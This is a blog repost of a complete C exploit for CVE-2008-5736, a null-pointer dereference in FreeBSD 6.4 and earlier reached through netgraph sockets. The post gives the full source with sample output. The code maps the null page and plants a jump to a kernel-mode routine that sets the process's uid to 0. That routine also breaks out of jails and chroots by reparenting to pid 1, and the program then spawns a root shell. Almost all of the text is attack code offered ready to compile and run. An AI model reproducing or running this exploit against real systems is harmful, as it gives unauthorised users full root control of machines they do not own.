2012. 4. 15. 02:55

/*  


 * FreeBSD <= 6.4-RELEASE Netgraph Exploit  


 * by zx2c4  


 *   


 *   


 * This is an exploit for CVE-2008-5736, the FreeBSD protosw  


 * and loosely based on Don Bailey's 2008 exploit -  


 * http://www.exploit-db.com/exploits/7581/ . The thing with  


 * Don's exploit is that it relies on having a known location  


 * of allproc, which means having access to the kernel or  


 * debugging symbols, either of which might not be available.  


 * Initial attempts included a general memory search for some  


 * characteristics of allproc, but this was difficult to make  


 * reliable. This solution here is a much more standard - get  


 * the current thread, change its permissions, and execl to  


 * shell. Additionally, it breaks out of chroots and freebsd  


 * jails by reparenting to pid 1 and copying its fds.  


 *  


 * This reliably works on kernels on or below 6.4-RELEASE:  


 *  


 * $ gcc a.c  


 * $ ./a.out  


 * ~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~  


 * ~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~  


 * ~~~~~ greetz to don bailey, edemveiss ~~~~~  


 *  


 * [+] mmapping null page  


 * [+] adding jmp to pwnage in null page  


 * [+] opening netgraph socket  


 * [+] triggering null dereference  


 * [+] elevating permissions  


 * [+] got root!  


 * #  


 *  


 * It's an oldie, but simple enough that someone needed  


 * to write another PoC exploit at some point.  


 *  


 * cheers,  


 * zx2c4, 27-2-2011  


 *  


 */ 


   


#define _KERNEL  


#include <sys/types.h>  


#include <sys/time.h>  


#include <sys/param.h>  


#include <sys/proc.h>  


#include <sys/ucred.h>  


#include <sys/mman.h>  


#include <sys/socket.h>  


#include <sys/stat.h>  


#include <sys/filedesc.h>  


#include <sys/queue.h>  


#include <netgraph/ng_socket.h>  


#include <stdio.h>  


#include <fcntl.h>  


#include <unistd.h>  


   


#define PAGES 1  


   


   


volatile int got_root = 0;  


int root(void)  


{  


    struct thread *thread;  


    asm(  


        "movl %%fs:0, %0" 


        : "=r"(thread)  


    );  


    thread->td_critnest = 0;  


    thread->td_proc->p_ucred->cr_uid = 0;  


    thread->td_proc->p_ucred->cr_prison = NULL;  


   


    struct proc *parent = thread->td_proc;  


    while (parent->p_pptr && parent->p_pid != 1)  


        parent = parent->p_pptr;  


    thread->td_proc->p_fd->fd_rdir = parent->p_fd->fd_rdir;  


    thread->td_proc->p_fd->fd_jdir = parent->p_fd->fd_jdir;  


    thread->td_proc->p_fd->fd_cdir = parent->p_fd->fd_cdir;  


    thread->td_proc->p_pptr = parent;  


   


    got_root = 1;  


    return 0;  


}  


   


int main(int argc, char *argv[])  


{  


    printf("~ FreeBSD <= 6.4-RELEASE Netgraph Exploit ~\n");  


    printf("~~~~~~~~~~~~~~~~~ by zx2c4 ~~~~~~~~~~~~~~~~\n");  


    printf("~~~~~ greetz to don bailey, edemveiss ~~~~~\n\n");  


   


    printf("[+] mmapping null page\n");  


    if (mmap(NULL, PAGES * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_FIXED, -1, 0) < 0) {  


        perror("[-] mmap failed");  


        return -1;  


    }  


   


    printf("[+] adding jmp to pwnage in null page\n");  


    *(char*)0x0 = 0x90;  


    *(char*)0x1 = 0xe9;  


    *(unsigned long*)0x2 = (unsigned long)&root;  


   


    printf("[+] opening netgraph socket\n");  


    int s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);  


    if (s < 0) {  


        perror("[-] failed to open netgraph socket");  


        return -1;  


    }  


   


    printf("[+] triggering null dereference\n");  


    shutdown(s, SHUT_RDWR);  


   


    if (!got_root) {  


        printf("[-] failed to trigger pwnage\n");  


        return -1;  


    }  


   


    printf("[+] elevating permissions\n");  


    setuid(0);    


    setgid(0);  


    if (getuid() != 0) {  


        printf("[-] failed to get root\n");  


        return -1;  


    }  


   


    printf("[+] got root!\n");  


    execl("/bin/sh", "sh", NULL);  


   


    return 0;  



Posted by k1rha